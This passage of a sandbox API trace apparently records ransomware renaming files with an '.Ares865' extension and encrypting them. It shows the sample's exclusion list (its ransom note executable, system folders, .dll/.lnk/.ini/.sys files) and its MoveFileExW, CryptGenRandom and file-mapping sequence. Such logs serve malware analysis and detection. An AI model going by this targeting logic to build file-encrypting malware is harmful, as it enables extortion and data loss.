(lpString1="Santo_Domingo", lpString2="perflogs") returned 1 [0055.865] lstrcmpiW (lpString1="Santo_Domingo", lpString2="MSBuild") returned 1 [0055.865] lstrlenW (lpString="Santo_Domingo") returned 13 [0055.865] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santiago") returned 56 [0055.866] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Santo_Domingo" | out: lpString1="Santo_Domingo") returned="Santo_Domingo" [0055.866] lstrlenW (lpString="Santo_Domingo") returned 13 [0055.866] lstrlenW (lpString="Ares865") returned 7 [0055.866] lstrcmpiW (lpString1="Domingo", lpString2="Ares865") returned 1 [0055.866] lstrlenW (lpString=".dll") returned 4 [0055.866] lstrcmpiW (lpString1="Santo_Domingo", lpString2=".dll") returned 1 [0055.866] lstrlenW (lpString=".lnk") returned 4 [0055.866] lstrcmpiW (lpString1="Santo_Domingo", lpString2=".lnk") returned 1 [0055.866] lstrlenW (lpString=".ini") returned 4 [0055.866] lstrcmpiW (lpString1="Santo_Domingo", lpString2=".ini") returned 1 [0055.866] lstrlenW (lpString=".sys") returned 4 [0055.866] lstrcmpiW (lpString1="Santo_Domingo", lpString2=".sys") returned 1 [0055.866] lstrlenW (lpString="Santo_Domingo") returned 13 [0055.866] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sao_Paulo", cAlternateFileName="SAO_PA~1")) returned 1 [0055.866] lstrcmpiW (lpString1="Sao_Paulo", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0055.866] lstrcmpiW (lpString1="Sao_Paulo", lpString2="aoldtz.exe") returned 1 [0055.866] lstrcmpiW (lpString1="Sao_Paulo", lpString2=".") returned 1 [0055.866] lstrcmpiW (lpString1="Sao_Paulo", lpString2="..") returned 1 [0055.866] lstrcmpiW (lpString1="Sao_Paulo", lpString2="windows") returned -1 [0055.866] lstrcmpiW (lpString1="Sao_Paulo", lpString2="bootmgr") returned 1 [0055.866] lstrcmpiW (lpString1="Sao_Paulo", lpString2="temp") returned -1 [0055.866] lstrcmpiW (lpString1="Sao_Paulo", lpString2="pagefile.sys") returned 1 [0055.866] lstrcmpiW (lpString1="Sao_Paulo", lpString2="boot") returned 1 [0055.866] lstrcmpiW (lpString1="Sao_Paulo", lpString2="ids.txt") returned 1 [0055.866] lstrcmpiW (lpString1="Sao_Paulo", lpString2="ntuser.dat") returned 1 [0055.866] lstrcmpiW (lpString1="Sao_Paulo", lpString2="perflogs") returned 1 [0055.866] lstrcmpiW (lpString1="Sao_Paulo", lpString2="MSBuild") returned 1 [0055.866] lstrlenW (lpString="Sao_Paulo") returned 9 [0055.866] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santo_Domingo") returned 61 [0055.866] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Sao_Paulo" | out: lpString1="Sao_Paulo") returned="Sao_Paulo" [0055.866] lstrlenW (lpString="Sao_Paulo") returned 9 [0055.866] lstrlenW (lpString="Ares865") returned 7 [0055.866] lstrcmpiW (lpString1="o_Paulo", lpString2="Ares865") returned 1 [0055.867] lstrlenW (lpString=".dll") returned 4 [0055.867] lstrcmpiW (lpString1="Sao_Paulo", lpString2=".dll") returned 1 [0055.867] lstrlenW (lpString=".lnk") returned 4 [0055.867] lstrcmpiW (lpString1="Sao_Paulo", lpString2=".lnk") returned 1 [0055.867] lstrlenW (lpString=".ini") returned 4 [0055.867] lstrcmpiW (lpString1="Sao_Paulo", lpString2=".ini") returned 1 [0055.867] lstrlenW (lpString=".sys") returned 4 [0055.867] lstrcmpiW (lpString1="Sao_Paulo", lpString2=".sys") returned 1 [0055.867] lstrlenW (lpString="Sao_Paulo") returned 9 [0055.867] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x410, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Scoresbysund", cAlternateFileName="SCORES~1")) returned 1 [0055.867] lstrcmpiW (lpString1="Scoresbysund", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0055.867] lstrcmpiW (lpString1="Scoresbysund", lpString2="aoldtz.exe") returned 1 [0055.867] lstrcmpiW (lpString1="Scoresbysund", lpString2=".") returned 1 [0055.867] lstrcmpiW (lpString1="Scoresbysund", lpString2="..") returned 1 [0055.867] lstrcmpiW (lpString1="Scoresbysund", lpString2="windows") returned -1 [0055.867] lstrcmpiW (lpString1="Scoresbysund", lpString2="bootmgr") returned 1 [0055.867] lstrcmpiW (lpString1="Scoresbysund", lpString2="temp") returned -1 [0055.867] lstrcmpiW (lpString1="Scoresbysund", lpString2="pagefile.sys") returned 1 [0055.867] lstrcmpiW (lpString1="Scoresbysund", lpString2="boot") returned 1 [0055.867] lstrcmpiW (lpString1="Scoresbysund", lpString2="ids.txt") returned 1 [0055.867] lstrcmpiW (lpString1="Scoresbysund", lpString2="ntuser.dat") returned 1 [0055.867] lstrcmpiW (lpString1="Scoresbysund", lpString2="perflogs") returned 1 [0055.867] lstrcmpiW (lpString1="Scoresbysund", lpString2="MSBuild") returned 1 [0055.867] lstrlenW (lpString="Scoresbysund") returned 12 [0055.867] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sao_Paulo") returned 57 [0055.867] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Scoresbysund" | out: lpString1="Scoresbysund") returned="Scoresbysund" [0055.867] lstrlenW (lpString="Scoresbysund") returned 12 [0055.867] lstrlenW (lpString="Ares865") returned 7 [0055.867] lstrcmpiW (lpString1="sbysund", lpString2="Ares865") returned 1 [0055.867] lstrlenW (lpString=".dll") returned 4 [0055.867] lstrcmpiW (lpString1="Scoresbysund", lpString2=".dll") returned 1 [0055.867] lstrlenW (lpString=".lnk") returned 4 [0055.867] lstrcmpiW (lpString1="Scoresbysund", lpString2=".lnk") returned 1 [0055.868] lstrlenW (lpString=".ini") returned 4 [0055.868] lstrcmpiW (lpString1="Scoresbysund", lpString2=".ini") returned 1 [0055.868] lstrlenW (lpString=".sys") returned 4 [0055.868] lstrcmpiW (lpString1="Scoresbysund", lpString2=".sys") returned 1 [0055.868] lstrlenW (lpString="Scoresbysund") returned 12 [0055.868] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sitka", cAlternateFileName="")) returned 1 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2="aoldtz.exe") returned 1 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2=".") returned 1 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2="..") returned 1 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2="windows") returned -1 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2="bootmgr") returned 1 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2="temp") returned -1 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2="pagefile.sys") returned 1 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2="boot") returned 1 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2="ids.txt") returned 1 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2="ntuser.dat") returned 1 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2="perflogs") returned 1 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2="MSBuild") returned 1 [0055.868] lstrlenW (lpString="Sitka") returned 5 [0055.868] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Scoresbysund") returned 60 [0055.868] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Sitka" | out: lpString1="Sitka") returned="Sitka" [0055.868] lstrlenW (lpString="Sitka") returned 5 [0055.868] lstrlenW (lpString="Ares865") returned 7 [0055.868] lstrlenW (lpString=".dll") returned 4 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2=".dll") returned 1 [0055.868] lstrlenW (lpString=".lnk") returned 4 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2=".lnk") returned 1 [0055.868] lstrlenW (lpString=".ini") returned 4 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2=".ini") returned 1 [0055.868] lstrlenW (lpString=".sys") returned 4 [0055.868] lstrcmpiW (lpString1="Sitka", lpString2=".sys") returned 1 [0055.869] lstrlenW (lpString="Sitka") returned 5 [0055.869] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x7d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="St_Johns", cAlternateFileName="")) returned 1 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2="aoldtz.exe") returned 1 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2=".") returned 1 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2="..") returned 1 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2="windows") returned -1 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2="bootmgr") returned 1 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2="temp") returned -1 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2="pagefile.sys") returned 1 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2="boot") returned 1 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2="ids.txt") returned 1 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2="ntuser.dat") returned 1 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2="perflogs") returned 1 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2="MSBuild") returned 1 [0055.869] lstrlenW (lpString="St_Johns") returned 8 [0055.869] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sitka") returned 53 [0055.869] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="St_Johns" | out: lpString1="St_Johns") returned="St_Johns" [0055.869] lstrlenW (lpString="St_Johns") returned 8 [0055.869] lstrlenW (lpString="Ares865") returned 7 [0055.869] lstrcmpiW (lpString1="t_Johns", lpString2="Ares865") returned 1 [0055.869] lstrlenW (lpString=".dll") returned 4 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2=".dll") returned 1 [0055.869] lstrlenW (lpString=".lnk") returned 4 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2=".lnk") returned 1 [0055.869] lstrlenW (lpString=".ini") returned 4 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2=".ini") returned 1 [0055.869] lstrlenW (lpString=".sys") returned 4 [0055.869] lstrcmpiW (lpString1="St_Johns", lpString2=".sys") returned 1 [0055.869] lstrlenW (lpString="St_Johns") returned 8 [0055.869] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="St_Kitts", cAlternateFileName="")) returned 1 [0055.869] lstrcmpiW (lpString1="St_Kitts", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2="aoldtz.exe") returned 1 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2=".") returned 1 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2="..") returned 1 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2="windows") returned -1 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2="bootmgr") returned 1 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2="temp") returned -1 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2="pagefile.sys") returned 1 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2="boot") returned 1 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2="ids.txt") returned 1 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2="ntuser.dat") returned 1 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2="perflogs") returned 1 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2="MSBuild") returned 1 [0055.870] lstrlenW (lpString="St_Kitts") returned 8 [0055.870] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Johns") returned 56 [0055.870] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="St_Kitts" | out: lpString1="St_Kitts") returned="St_Kitts" [0055.870] lstrlenW (lpString="St_Kitts") returned 8 [0055.870] lstrlenW (lpString="Ares865") returned 7 [0055.870] lstrcmpiW (lpString1="t_Kitts", lpString2="Ares865") returned 1 [0055.870] lstrlenW (lpString=".dll") returned 4 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2=".dll") returned 1 [0055.870] lstrlenW (lpString=".lnk") returned 4 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2=".lnk") returned 1 [0055.870] lstrlenW (lpString=".ini") returned 4 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2=".ini") returned 1 [0055.870] lstrlenW (lpString=".sys") returned 4 [0055.870] lstrcmpiW (lpString1="St_Kitts", lpString2=".sys") returned 1 [0055.870] lstrlenW (lpString="St_Kitts") returned 8 [0055.870] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="St_Lucia", cAlternateFileName="")) returned 1 [0055.870] lstrcmpiW (lpString1="St_Lucia", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0055.870] lstrcmpiW (lpString1="St_Lucia", lpString2="aoldtz.exe") returned 1 [0055.870] lstrcmpiW (lpString1="St_Lucia", lpString2=".") returned 1 [0055.870] lstrcmpiW (lpString1="St_Lucia", lpString2="..") returned 1 [0055.871] lstrcmpiW (lpString1="St_Lucia", lpString2="windows") returned -1 [0055.871] lstrcmpiW (lpString1="St_Lucia", lpString2="bootmgr") returned 1 [0055.871] lstrcmpiW (lpString1="St_Lucia", lpString2="temp") returned -1 [0055.871] lstrcmpiW (lpString1="St_Lucia", lpString2="pagefile.sys") returned 1 [0055.871] lstrcmpiW (lpString1="St_Lucia", lpString2="boot") returned 1 [0055.871] lstrcmpiW (lpString1="St_Lucia", lpString2="ids.txt") returned 1 [0055.871] lstrcmpiW (lpString1="St_Lucia", lpString2="ntuser.dat") returned 1 [0055.871] lstrcmpiW (lpString1="St_Lucia", lpString2="perflogs") returned 1 [0055.871] lstrcmpiW (lpString1="St_Lucia", lpString2="MSBuild") returned 1 [0055.871] lstrlenW (lpString="St_Lucia") returned 8 [0055.871] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Kitts") returned 56 [0055.871] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="St_Lucia" | out: lpString1="St_Lucia") returned="St_Lucia" [0055.871] lstrlenW (lpString="St_Lucia") returned 8 [0055.871] lstrlenW (lpString="Ares865") returned 7 [0055.871] lstrcmpiW (lpString1="t_Lucia", lpString2="Ares865") returned 1 [0055.871] lstrlenW (lpString=".dll") returned 4 [0055.871] lstrcmpiW (lpString1="St_Lucia", lpString2=".dll") returned 1 [0055.871] lstrlenW (lpString=".lnk") returned 4 [0055.871] lstrcmpiW (lpString1="St_Lucia", lpString2=".lnk") returned 1 [0055.871] lstrlenW (lpString=".ini") returned 4 [0055.871] lstrcmpiW (lpString1="St_Lucia", lpString2=".ini") returned 1 [0055.871] lstrlenW (lpString=".sys") returned 4 [0055.871] lstrcmpiW (lpString1="St_Lucia", lpString2=".sys") returned 1 [0055.871] lstrlenW (lpString="St_Lucia") returned 8 [0055.871] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="St_Thomas", cAlternateFileName="ST_THO~1")) returned 1 [0055.871] lstrcmpiW (lpString1="St_Thomas", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0055.871] lstrcmpiW (lpString1="St_Thomas", lpString2="aoldtz.exe") returned 1 [0055.871] lstrcmpiW (lpString1="St_Thomas", lpString2=".") returned 1 [0055.871] lstrcmpiW (lpString1="St_Thomas", lpString2="..") returned 1 [0055.871] lstrcmpiW (lpString1="St_Thomas", lpString2="windows") returned -1 [0055.871] lstrcmpiW (lpString1="St_Thomas", lpString2="bootmgr") returned 1 [0055.871] lstrcmpiW (lpString1="St_Thomas", lpString2="temp") returned -1 [0055.871] lstrcmpiW (lpString1="St_Thomas", lpString2="pagefile.sys") returned 1 [0055.871] lstrcmpiW (lpString1="St_Thomas", lpString2="boot") returned 1 [0055.872] lstrcmpiW (lpString1="St_Thomas", lpString2="ids.txt") returned 1 [0055.872] lstrcmpiW (lpString1="St_Thomas", lpString2="ntuser.dat") returned 1 [0055.872] lstrcmpiW (lpString1="St_Thomas", lpString2="perflogs") returned 1 [0055.872] lstrcmpiW (lpString1="St_Thomas", lpString2="MSBuild") returned 1 [0055.872] lstrlenW (lpString="St_Thomas") returned 9 [0055.872] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Lucia") returned 56 [0055.872] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="St_Thomas" | out: lpString1="St_Thomas") returned="St_Thomas" [0055.872] lstrlenW (lpString="St_Thomas") returned 9 [0055.872] lstrlenW (lpString="Ares865") returned 7 [0055.872] lstrcmpiW (lpString1="_Thomas", lpString2="Ares865") returned -1 [0055.872] lstrlenW (lpString=".dll") returned 4 [0055.872] lstrcmpiW (lpString1="St_Thomas", lpString2=".dll") returned 1 [0055.872] lstrlenW (lpString=".lnk") returned 4 [0055.872] lstrcmpiW (lpString1="St_Thomas", lpString2=".lnk") returned 1 [0055.872] lstrlenW (lpString=".ini") returned 4 [0055.872] lstrcmpiW (lpString1="St_Thomas", lpString2=".ini") returned 1 [0055.872] lstrlenW (lpString=".sys") returned 4 [0055.872] lstrcmpiW (lpString1="St_Thomas", lpString2=".sys") returned 1 [0055.872] lstrlenW (lpString="St_Thomas") returned 9 [0055.872] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Thomas.Ares865") returned 65 [0055.872] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Thomas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_thomas"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Thomas.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_thomas.ares865"), dwFlags=0x1) returned 1 [0055.873] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Thomas.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_thomas.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0055.873] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=65) returned 1 [0055.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.987] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0055.987] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0055.987] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0055.987] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.988] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0055.988] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x120 [0056.031] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0056.038] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0056.038] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0056.038] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0056.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8eb8 [0056.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0056.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0056.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0056.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0056.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0056.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0056.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0056.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0056.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0056.039] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0056.039] CloseHandle (hObject=0x120) returned 1 [0056.039] CloseHandle (hObject=0x118) returned 1 [0056.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0056.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0056.041] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="St_Vincent", cAlternateFileName="ST_VIN~1")) returned 1 [0056.041] lstrcmpiW (lpString1="St_Vincent", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.041] lstrcmpiW (lpString1="St_Vincent", lpString2="aoldtz.exe") returned 1 [0056.041] lstrcmpiW (lpString1="St_Vincent", lpString2=".") returned 1 [0056.041] lstrcmpiW (lpString1="St_Vincent", lpString2="..") returned 1 [0056.041] lstrcmpiW (lpString1="St_Vincent", lpString2="windows") returned -1 [0056.041] lstrcmpiW (lpString1="St_Vincent", lpString2="bootmgr") returned 1 [0056.041] lstrcmpiW (lpString1="St_Vincent", lpString2="temp") returned -1 [0056.041] lstrcmpiW (lpString1="St_Vincent", lpString2="pagefile.sys") returned 1 [0056.041] lstrcmpiW (lpString1="St_Vincent", lpString2="boot") returned 1 [0056.041] lstrcmpiW (lpString1="St_Vincent", lpString2="ids.txt") returned 1 [0056.041] lstrcmpiW (lpString1="St_Vincent", lpString2="ntuser.dat") returned 1 [0056.041] lstrcmpiW (lpString1="St_Vincent", lpString2="perflogs") returned 1 [0056.041] lstrcmpiW (lpString1="St_Vincent", lpString2="MSBuild") returned 1 [0056.041] lstrlenW (lpString="St_Vincent") returned 10 [0056.041] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Thomas") returned 57 [0056.041] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="St_Vincent" | out: lpString1="St_Vincent") returned="St_Vincent" [0056.041] lstrlenW (lpString="St_Vincent") returned 10 [0056.041] lstrlenW (lpString="Ares865") returned 7 [0056.041] lstrcmpiW (lpString1="Vincent", lpString2="Ares865") returned 1 [0056.042] lstrlenW (lpString=".dll") returned 4 [0056.042] lstrcmpiW (lpString1="St_Vincent", lpString2=".dll") returned 1 [0056.042] lstrlenW (lpString=".lnk") returned 4 [0056.042] lstrcmpiW (lpString1="St_Vincent", lpString2=".lnk") returned 1 [0056.042] lstrlenW (lpString=".ini") returned 4 [0056.042] lstrcmpiW (lpString1="St_Vincent", lpString2=".ini") returned 1 [0056.042] lstrlenW (lpString=".sys") returned 4 [0056.042] lstrcmpiW (lpString1="St_Vincent", lpString2=".sys") returned 1 [0056.042] lstrlenW (lpString="St_Vincent") returned 10 [0056.042] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xf1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Swift_Current", cAlternateFileName="SWIFT_~1")) returned 1 [0056.042] lstrcmpiW (lpString1="Swift_Current", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.042] lstrcmpiW (lpString1="Swift_Current", lpString2="aoldtz.exe") returned 1 [0056.042] lstrcmpiW (lpString1="Swift_Current", lpString2=".") returned 1 [0056.042] lstrcmpiW (lpString1="Swift_Current", lpString2="..") returned 1 [0056.042] lstrcmpiW (lpString1="Swift_Current", lpString2="windows") returned -1 [0056.042] lstrcmpiW (lpString1="Swift_Current", 